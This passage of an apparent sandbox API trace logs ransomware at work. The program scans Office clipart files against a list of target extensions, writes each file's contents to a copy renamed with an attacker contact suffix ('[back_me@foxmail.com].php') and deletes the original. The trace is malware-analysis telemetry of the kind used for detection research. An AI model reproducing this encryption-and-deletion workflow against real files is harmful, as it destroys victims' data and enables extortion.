lpString2=".WMF") returned -1 [0264.836] lstrlenW (lpString=".bz2") returned 4 [0264.836] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0264.836] lstrlenW (lpString=".7z") returned 3 [0264.836] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0264.836] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0157167.WMF") returned 63 [0264.836] lstrlenW (lpString=".dbf") returned 4 [0264.836] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0264.836] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0157167.WMF") returned 63 [0264.836] lstrlenW (lpString=".1cd") returned 4 [0264.836] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0264.836] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0157167.WMF") returned 63 [0264.836] lstrlenW (lpString=".jpg") returned 4 [0264.836] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0264.837] lstrcmpiW (lpString1=".WMF", lpString2=".php") returned 1 [0264.837] lstrlenW (lpString="J0158071.WMF") returned 12 [0264.837] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0158071.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0158071.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x354 [0264.837] GetFileSizeEx (in: hFile=0x354, lpFileSize=0x36aff1c | out: lpFileSize=0x36aff1c*=18652) returned 1 [0264.837] CloseHandle (hObject=0x354) returned 1 [0264.837] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0158071.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0158071.wmf")) returned 0x20 [0264.837] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0158071.WMF.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0158071.wmf.id-9c354b42.[back_me@foxmail.com].php")) returned 0xffffffff [0264.837] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0158071.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0158071.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x354 [0264.837] SetFilePointerEx (in: hFile=0x354, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x36afec8 | out: lpNewFilePointer=0x0) returned 1 [0264.837] SetFilePointerEx (in: hFile=0x354, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x36afec8 | out: lpNewFilePointer=0x0) returned 1 [0264.837] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0158071.WMF.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0158071.wmf.id-9c354b42.[back_me@foxmail.com].php"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3e4 [0264.838] GetLastError () returned 0x0 [0264.838] ReadFile (in: hFile=0x354, lpBuffer=0x4290020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x36afed4, lpOverlapped=0x0 | out: lpBuffer=0x4290020*, lpNumberOfBytesRead=0x36afed4*=0x48dc, lpOverlapped=0x0) returned 1 [0264.843] WriteFile (in: hFile=0x3e4, lpBuffer=0x4290020*, nNumberOfBytesToWrite=0x48e0, lpNumberOfBytesWritten=0x36afc9c, lpOverlapped=0x0 | out: lpBuffer=0x4290020*, lpNumberOfBytesWritten=0x36afc9c*=0x48e0, lpOverlapped=0x0) returned 1 [0264.844] ReadFile (in: hFile=0x354, lpBuffer=0x4290020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x36afed4, lpOverlapped=0x0 | out: lpBuffer=0x4290020*, lpNumberOfBytesRead=0x36afed4*=0x0, lpOverlapped=0x0) returned 1 [0264.844] WriteFile (in: hFile=0x3e4, lpBuffer=0x4290020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x36afc9c, lpOverlapped=0x0 | out: lpBuffer=0x4290020*, lpNumberOfBytesWritten=0x36afc9c*=0xec, lpOverlapped=0x0) returned 1 [0264.844] SetEndOfFile (hFile=0x3e4) returned 1 [0264.844] CloseHandle (hObject=0x3e4) returned 1 [0264.844] SetFilePointerEx (in: hFile=0x354, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x36afec8 | out: lpNewFilePointer=0x0) returned 1 [0264.845] SetEndOfFile (hFile=0x354) returned 1 [0264.847] CloseHandle (hObject=0x354) returned 1 [0264.847] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0158071.WMF.id-9C354B42.[back_me@foxmail.com].php", dwFileAttributes=0x20) returned 1 [0264.847] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0158071.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0158071.wmf")) returned 1 [0264.847] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0158071.WMF") returned 63 [0264.847] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0158071.WMF") returned 63 [0264.847] lstrlenW (lpString=".doc") returned 4 [0264.847] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0264.847] lstrlenW (lpString=".docx") returned 5 [0264.847] lstrcmpiW (lpString1=".docx", lpString2="1.WMF") returned -1 [0264.847] lstrlenW (lpString=".pdf") returned 4 [0264.847] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0264.847] lstrlenW (lpString=".xls") returned 4 [0264.847] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0264.847] lstrlenW (lpString=".xlsx") returned 5 [0264.847] lstrcmpiW (lpString1=".xlsx", lpString2="1.WMF") returned -1 [0264.847] lstrlenW (lpString=".ppt") returned 4 [0264.847] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0264.847] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0158071.WMF") returned 63 [0264.847] lstrlenW (lpString=".zip") returned 4 [0264.848] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0264.848] lstrlenW (lpString=".rar") returned 4 [0264.848] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0264.848] lstrlenW (lpString=".bz2") returned 4 [0264.848] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0264.848] lstrlenW (lpString=".7z") returned 3 [0264.848] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0264.848] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0158071.WMF") returned 63 [0264.848] lstrlenW (lpString=".dbf") returned 4 [0264.848] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0264.848] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0158071.WMF") returned 63 [0264.848] lstrlenW (lpString=".1cd") returned 4 [0264.848] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0264.848] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0158071.WMF") returned 63 [0264.848] lstrlenW (lpString=".jpg") returned 4 [0264.848] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0264.848] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0158071.WMF") returned 63 [0264.848] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0158071.WMF") returned 63 [0264.848] lstrlenW (lpString=".doc") returned 4 [0264.848] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0264.848] lstrlenW (lpString=".docx") returned 5 [0264.848] lstrcmpiW (lpString1=".docx", lpString2="1.WMF") returned -1 [0264.848] lstrlenW (lpString=".pdf") returned 4 [0264.848] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0264.848] lstrlenW (lpString=".xls") returned 4 [0264.848] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0264.848] lstrlenW (lpString=".xlsx") returned 5 [0264.848] lstrcmpiW (lpString1=".xlsx", lpString2="1.WMF") returned -1 [0264.848] lstrlenW (lpString=".ppt") returned 4 [0264.848] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0264.848] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0158071.WMF") returned 63 [0264.848] lstrlenW (lpString=".zip") returned 4 [0264.848] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0264.848] lstrlenW (lpString=".rar") returned 4 [0264.849] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0264.849] lstrlenW (lpString=".bz2") returned 4 [0264.849] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0264.849] lstrlenW (lpString=".7z") returned 3 [0264.849] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0264.849] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0158071.WMF") returned 63 [0264.849] lstrlenW (lpString=".dbf") returned 4 [0264.849] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0264.849] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0158071.WMF") returned 63 [0264.849] lstrlenW (lpString=".1cd") returned 4 [0264.849] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0264.849] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0158071.WMF") returned 63 [0264.849] lstrlenW (lpString=".jpg") returned 4 [0264.849] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0264.849] lstrcmpiW (lpString1=".WMF", lpString2=".php") returned 1 [0264.849] lstrlenW (lpString="J0160590.WMF") returned 12 [0264.849] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0160590.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0160590.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3b4 [0264.945] GetFileSizeEx (in: hFile=0x3b4, lpFileSize=0x36aff1c | out: lpFileSize=0x36aff1c*=29406) returned 1 [0264.945] CloseHandle (hObject=0x3b4) returned 1 [0264.945] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0160590.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0160590.wmf")) returned 0x20 [0264.945] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0160590.WMF.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0160590.wmf.id-9c354b42.[back_me@foxmail.com].php")) returned 0xffffffff [0264.945] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0160590.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0160590.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3b4 [0264.946] SetFilePointerEx (in: hFile=0x3b4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x36afec8 | out: lpNewFilePointer=0x0) returned 1 [0264.946] SetFilePointerEx (in: hFile=0x3b4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x36afec8 | out: lpNewFilePointer=0x0) returned 1 [0264.946] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0160590.WMF.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0160590.wmf.id-9c354b42.[back_me@foxmail.com].php"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x318 [0264.946] GetLastError () returned 0x0 [0264.946] ReadFile (in: hFile=0x3b4, lpBuffer=0x4290020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x36afed4, lpOverlapped=0x0 | out: lpBuffer=0x4290020*, lpNumberOfBytesRead=0x36afed4*=0x72de, lpOverlapped=0x0) returned 1 [0264.948] WriteFile (in: hFile=0x318, lpBuffer=0x4290020*, nNumberOfBytesToWrite=0x72e0, lpNumberOfBytesWritten=0x36afc9c, lpOverlapped=0x0 | out: lpBuffer=0x4290020*, lpNumberOfBytesWritten=0x36afc9c*=0x72e0, lpOverlapped=0x0) returned 1 [0264.949] ReadFile (in: hFile=0x3b4, lpBuffer=0x4290020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x36afed4, lpOverlapped=0x0 | out: lpBuffer=0x4290020*, lpNumberOfBytesRead=0x36afed4*=0x0, lpOverlapped=0x0) returned 1 [0264.949] WriteFile (in: hFile=0x318, lpBuffer=0x4290020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x36afc9c, lpOverlapped=0x0 | out: lpBuffer=0x4290020*, lpNumberOfBytesWritten=0x36afc9c*=0xec, lpOverlapped=0x0) returned 1 [0264.949] SetEndOfFile (hFile=0x318) returned 1 [0264.949] CloseHandle (hObject=0x318) returned 1 [0264.949] SetFilePointerEx (in: hFile=0x3b4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x36afec8 | out: lpNewFilePointer=0x0) returned 1 [0264.949] SetEndOfFile (hFile=0x3b4) returned 1 [0264.952] CloseHandle (hObject=0x3b4) returned 1 [0264.952] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0160590.WMF.id-9C354B42.[back_me@foxmail.com].php", dwFileAttributes=0x20) returned 1 [0264.952] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0160590.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0160590.wmf")) returned 1 [0264.952] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0160590.WMF") returned 63 [0264.952] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0160590.WMF") returned 63 [0264.952] lstrlenW (lpString=".doc") returned 4 [0264.952] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0264.952] lstrlenW (lpString=".docx") returned 5 [0264.952] lstrcmpiW (lpString1=".docx", lpString2="0.WMF") returned -1 [0264.952] lstrlenW (lpString=".pdf") returned 4 [0264.952] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0264.952] lstrlenW (lpString=".xls") returned 4 [0264.952] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0264.952] lstrlenW (lpString=".xlsx") returned 5 [0264.952] lstrcmpiW (lpString1=".xlsx", lpString2="0.WMF") returned -1 [0264.952] lstrlenW (lpString=".ppt") returned 4 [0264.953] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0264.953] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0160590.WMF") returned 63 [0264.953] lstrlenW (lpString=".zip") returned 4 [0264.953] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0264.953] lstrlenW (lpString=".rar") returned 4 [0264.953] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0264.953] lstrlenW (lpString=".bz2") returned 4 [0264.953] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0264.953] lstrlenW (lpString=".7z") returned 3 [0264.953] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0264.953] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0160590.WMF") returned 63 [0264.953] lstrlenW (lpString=".dbf") returned 4 [0264.953] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0264.953] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0160590.WMF") returned 63 [0264.953] lstrlenW (lpString=".1cd") returned 4 [0264.953] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0264.953] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0160590.WMF") returned 63 [0264.953] lstrlenW (lpString=".jpg") returned 4 [0264.953] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0264.953] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0160590.WMF") returned 63 [0264.953] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0160590.WMF") returned 63 [0264.953] lstrlenW (lpString=".doc") returned 4 [0264.953] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0264.953] lstrlenW (lpString=".docx") returned 5 [0264.953] lstrcmpiW (lpString1=".docx", lpString2="0.WMF") returned -1 [0264.953] lstrlenW (lpString=".pdf") returned 4 [0264.953] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0264.953] lstrlenW (lpString=".xls") returned 4 [0264.953] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0264.953] lstrlenW (lpString=".xlsx") returned 5 [0264.953] lstrcmpiW (lpString1=".xlsx", lpString2="0.WMF") returned -1 [0264.953] lstrlenW (lpString=".ppt") returned 4 [0264.953] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0264.954] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0160590.WMF") returned 63 [0264.954] lstrlenW (lpString=".zip") returned 4 [0264.954] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0264.954] lstrlenW (lpString=".rar") returned 4 [0264.954] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0264.954] lstrlenW (lpString=".bz2") returned 4 [0264.954] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0264.954] lstrlenW (lpString=".7z") returned 3 [0264.954] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0264.954] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0160590.WMF") returned 63 [0264.954] lstrlenW (lpString=".dbf") returned 4 [0264.954] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0264.954] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0160590.WMF") returned 63 [0264.954] lstrlenW (lpString=".1cd") returned 4 [0264.954] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0264.954] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0160590.WMF") returned 63 [0264.954] lstrlenW (lpString=".jpg") returned 4 [0264.954] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0264.954] lstrcmpiW (lpString1=".JPG", lpString2=".php") returned -1 [0264.954] lstrlenW (lpString="J0177806.JPG") returned 12 [0264.954] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0177806.JPG" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0177806.jpg"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3b4 [0264.955] GetFileSizeEx (in: hFile=0x3b4, lpFileSize=0x36aff1c | out: lpFileSize=0x36aff1c*=55554) returned 1 [0264.955] CloseHandle (hObject=0x3b4) returned 1 [0264.955] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0177806.JPG" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0177806.jpg")) returned 0x20 [0264.955] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0177806.JPG.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0177806.jpg.id-9c354b42.[back_me@foxmail.com].php")) returned 0xffffffff [0264.955] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0177806.JPG" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0177806.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3b4 [0264.956] SetFilePointerEx (in: hFile=0x3b4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x36afec8 | out: lpNewFilePointer=0x0) returned 1 [0264.956] SetFilePointerEx (in: hFile=0x3b4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x36afec8 | out: lpNewFilePointer=0x0) returned 1 [0264.956] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0177806.JPG.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0177806.jpg.id-9c354b42.[back_me@foxmail.com].php"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x318 [0264.956] GetLastError () returned 0x0 [0264.956] ReadFile (in: hFile=0x3b4, lpBuffer=0x4290020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x36afed4, lpOverlapped=0x0 | out: lpBuffer=0x4290020*, lpNumberOfBytesRead=0x36afed4*=0xd902, lpOverlapped=0x0) returned 1 [0264.958] WriteFile (in: hFile=0x318, lpBuffer=0x4290020*, nNumberOfBytesToWrite=0xd910, lpNumberOfBytesWritten=0x36afc9c, lpOverlapped=0x0 | out: lpBuffer=0x4290020*, lpNumberOfBytesWritten=0x36afc9c*=0xd910, lpOverlapped=0x0) returned 1 [0264.960] ReadFile (in: hFile=0x3b4, lpBuffer=0x4290020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x36afed4, lpOverlapped=0x0 | out: lpBuffer=0x4290020*, lpNumberOfBytesRead=0x36afed4*=0x0, lpOverlapped=0x0) returned 1 [0264.960] WriteFile (in: hFile=0x318, lpBuffer=0x4290020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x36afc9c, lpOverlapped=0x0 | out: lpBuffer=0x4290020*, lpNumberOfBytesWritten=0x36afc9c*=0xec, lpOverlapped=0x0) returned 1 [0264.960] SetEndOfFile (hFile=0x318) returned 1 [0264.960] CloseHandle (hObject=0x318) returned 1 [0264.960] SetFilePointerEx (in: hFile=0x3b4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x36afec8 | out: lpNewFilePointer=0x0) returned 1 [0264.960] SetEndOfFile (hFile=0x3b4) returned 1 [0264.963] CloseHandle (hObject=0x3b4) returned 1 [0264.963] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0177806.JPG.id-9C354B42.[back_me@foxmail.com].php", dwFileAttributes=0x20) returned 1 [0264.963] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0177806.JPG" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0177806.jpg")) returned 1 [0264.963] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0177806.JPG") returned 63 [0264.963] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0177806.JPG") returned 63 [0264.963] lstrlenW (lpString=".doc") returned 4 [0264.963] lstrcmpiW (lpString1=".doc", lpString2=".JPG") returned -1 [0264.963] lstrlenW (lpString=".docx") returned 5 [0264.963] lstrcmpiW (lpString1=".docx", lpString2="6.JPG") returned -1 [0264.963] lstrlenW (lpString=".pdf") returned 4 [0264.963] lstrcmpiW (lpString1=".pdf", lpString2=".JPG") returned 1 [0264.963] lstrlenW (lpString=".xls") returned 4 [0264.963] lstrcmpiW (lpString1=".xls", lpString2=".JPG") returned 1 [0264.963] lstrlenW (lpString=".xlsx") returned 5 [0264.963] lstrcmpiW (lpString1=".xlsx", lpString2="6.JPG") returned -1 [0264.963] lstrlenW (lpString=".ppt") returned 4 [0264.964] lstrcmpiW (lpString1=".ppt", lpString2=".JPG") returned 1 [0264.964] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0177806.JPG") returned 63 [0264.964] lstrlenW (lpString=".zip") returned 4 [0264.964] lstrcmpiW (lpString1=".zip", lpString2=".JPG") returned 1 [0264.964] lstrlenW (lpString=".rar") returned 4 [0264.964] lstrcmpiW (lpString1=".rar", lpString2=".JPG") returned 1 [0264.964] lstrlenW (lpString=".bz2") returned 4 [0264.964] lstrcmpiW (lpString1=".bz2", lpString2=".JPG") returned -1 [0264.964] lstrlenW (lpString=".7z") returned 3 [0264.964] lstrcmpiW (lpString1=".7z", lpString2="JPG") returned -1 [0264.964] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0177806.JPG") returned 63 [0264.964] lstrlenW (lpString=".dbf") returned 4 [0264.964] lstrcmpiW (lpString1=".dbf", lpString2=".JPG") returned -1 [0264.964] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0177806.JPG") returned 63 [0264.964] lstrlenW (lpString=".1cd") returned 4 [0264.964] lstrcmpiW (lpString1=".1cd", lpString2=".JPG") returned -1 [0264.964] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0177806.JPG") returned 63 [0264.964] lstrlenW (lpString=".jpg") returned 4 [0264.964] lstrcmpiW (lpString1=".jpg", lpString2=".JPG") returned 0 [0264.964] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0177806.JPG") returned 63 [0264.964] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0177806.JPG") returned 63 [0264.964] lstrlenW (lpString=".doc") returned 4 [0264.964] lstrcmpiW (lpString1=".doc", lpString2=".JPG") returned -1 [0264.964] lstrlenW (lpString=".docx") returned 5 [0264.964] lstrcmpiW (lpString1=".docx", lpString2="6.JPG") returned -1 [0264.964] lstrlenW (lpString=".pdf") returned 4 [0264.964] lstrcmpiW (lpString1=".pdf", lpString2=".JPG") returned 1 [0264.964] lstrlenW (lpString=".xls") returned 4 [0264.964] lstrcmpiW (lpString1=".xls", lpString2=".JPG") returned 1 [0264.964] lstrlenW (lpString=".xlsx") returned 5 [0264.964] lstrcmpiW (lpString1=".xlsx", lpString2="6.JPG") returned -1 [0264.964] lstrlenW (lpString=".ppt") returned 4 [0264.964] lstrcmpiW (lpString1=".ppt", lpString2=".JPG") returned 1 [0264.964] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0177806.JPG") returned 63 [0264.965] lstrlenW (lpString=".zip") returned 4 [0264.965] lstrcmpiW (lpString1=".zip", lpString2=".JPG") returned 1 [0264.965] lstrlenW (lpString=".rar") returned 4 [0264.965] lstrcmpiW (lpString1=".rar", lpString2=".JPG") returned 1 [0264.965] lstrlenW (lpString=".bz2") returned 4 [0264.965] lstrcmpiW (lpString1=".bz2", lpString2=".JPG") returned -1 [0264.965] lstrlenW (lpString=".7z") returned 3 [0264.965] lstrcmpiW (lpString1=".7z", lpString2="JPG") returned -1 [0264.965] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0177806.JPG") returned 63 [0264.965] lstrlenW (lpString=".dbf") returned 4 [0264.965] lstrcmpiW (lpString1=".dbf", lpString2=".JPG") returned -1 [0264.965] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0177806.JPG") returned 63 [0264.965] lstrlenW (lpString=".1cd") returned 4 [0264.965] lstrcmpiW (lpString1=".1cd", lpString2=".JPG") returned -1 [0264.965] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0177806.JPG") returned 63 [0264.965] lstrlenW (lpString=".jpg") returned 4 [0264.965] lstrcmpiW (lpString1=".jpg", lpString2=".JPG") returned 0 [0264.965] lstrcmpiW (lpString1=".JPG", lpString2=".php") returned -1 